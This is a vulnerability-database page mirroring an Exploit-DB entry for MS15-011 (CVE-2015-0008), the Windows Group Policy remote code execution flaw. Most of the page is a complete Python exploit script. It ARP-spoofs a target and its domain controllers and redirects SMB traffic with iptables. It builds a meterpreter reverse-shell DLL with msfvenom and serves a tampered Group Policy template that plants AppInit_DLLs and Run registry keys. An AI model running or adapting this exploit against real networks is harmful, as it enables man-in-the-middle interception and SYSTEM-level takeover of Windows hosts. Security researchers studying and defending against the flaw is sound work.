Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)

🗓️ 29 Oct 2019 00:00:00Reported by Thomas ZukType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 541 Views

Microsoft Windows Server 2012 'Group Policy' Remote Code Execution (MS15-011) - Exploit allows remote code execution by modifying registry keys and targeting vulnerable systems for SMB signing disablement

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows Server 2012 - (Group Policy) Remote Code Execution Exploit
29 Oct 201900:00
zdt
CNVD		Microsoft Windows Group Policy Remote Code Execution Vulnerability
11 Feb 201500:00
cnvd
Check Point Advisories		Microsoft Windows Group Policy Remote Code Execution (MS15-011; CVE-2015-0008)
23 Feb 201500:00
checkpoint_advisories
CVE		CVE-2015-0008
11 Feb 201502:00
cve
Cvelist		CVE-2015-0008
11 Feb 201502:00
cvelist
EUVD		EUVD-2015-0046
7 Oct 202500:30
euvd
exploitpack		Microsoft Windows Server 2012 - Group Policy Remote Code Execution
29 Oct 201900:00
exploitpack
Kaspersky		KLA10473 Code execution vulnerability in Microsoft products
10 Mar 201500:00
kaspersky
NVD		CVE-2015-0008
11 Feb 201503:00
nvd
OpenVAS		Microsoft Group Policy Remote Code Execution Vulnerability (3000483)
11 Feb 201500:00
openvas
Rows per page
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, 
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0008
# Type: Remote
# Platform: Windows

# Description: While there exists multiple advisories for the vulnerability and video demos of 
# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code 
# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level 
# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).

#!/usr/bin/python3

import argparse
import os
import subprocess
import socket
import fcntl
import struct

# MS15-011 Exploit.
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.

def arpSpoof(interface, hostIP, targetIP):
    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
    arpArgs = arpCmd.split()
    print("Arpspoofing: %s" % (arpArgs))
    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

    
def karmaSMB(hostIP):
    print("reverting GptTmpl.inf from bak")
    os.system("cp GptTmpl.inf.bak GptTmpl.inf")
    appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
    CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
    f = open("GptTmpl.inf","a", encoding='utf-16le')
    f.write(appInit)
    f.write(CURunKey)
    f.close()
    
    path = os.getcwd()
    
    fConfig = open("smb.conf","w")
    fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
    fConfig.close()

    karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
    os.system(karmaCmd)


def iptables_config(targetIP, hostIP):
    print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
    os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')


def get_interface_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])

def generatePayload(lhost, lport):
    print("generating payload(s) and metasploit resource file")
    msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
    os.system(msfDll)
    msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
    print("metasploit resource script: %s" % msfResource)
    print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")
    
    file = open("meta_resource.rc", "w+")
    file.write(msfResource)
    file.close()
        


if __name__ == '__main__':

    parser = argparse.ArgumentParser()

    # Add arguments
    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
    parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
    parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)

    args = parser.parse_args()

    # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
    print ("checking for missing file(s)")
    if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
        print("Requirements missing. Downloading required files from github")
        os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
        os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")

    # Get the provided interfaces IP address
    ipAddr = get_interface_address(args.interface)

    if args.lhost is not None:
        lhost = args.lhost
    else:
        lhost = ipAddr

    if args.lport is not None:
        lport = args.lport
    else:
        lport = '4444'
    

    dcSpoof = ""
    dcCommaList = ""
    count = 0
  
    # loop over the domain controllers, poison each and target the host IP
    # create a comma separated list of DC's
    # create a "-t" separate list of DC's for use with arpspoof
    for dc in args.domain_controller:
        dcSpoof += "-t %s " % (dc)
        if count > 0: 
            dcCommaList += ",%s" % (dc)
        else:
            dcCommaList += "%s" % (dc)

        arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
        count += 1

    # arpspoof the target and all of the DC's
    arpSpoof(args.interface, args.target_ip, dcSpoof)

    # generate payloads
    generatePayload(lhost, lport)

    # Setup iptables forwarding rules
    iptables_config(args.target_ip, ipAddr)

    #run Karmba SMB Server
    karmaSMB(ipAddr)
   
    
    print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
    print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Oct 2019 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 28.3
EPSS0.10196
microsoft windows server 2012group policyremote code executionvulnerabilityexploitsmb signingregistry keys
541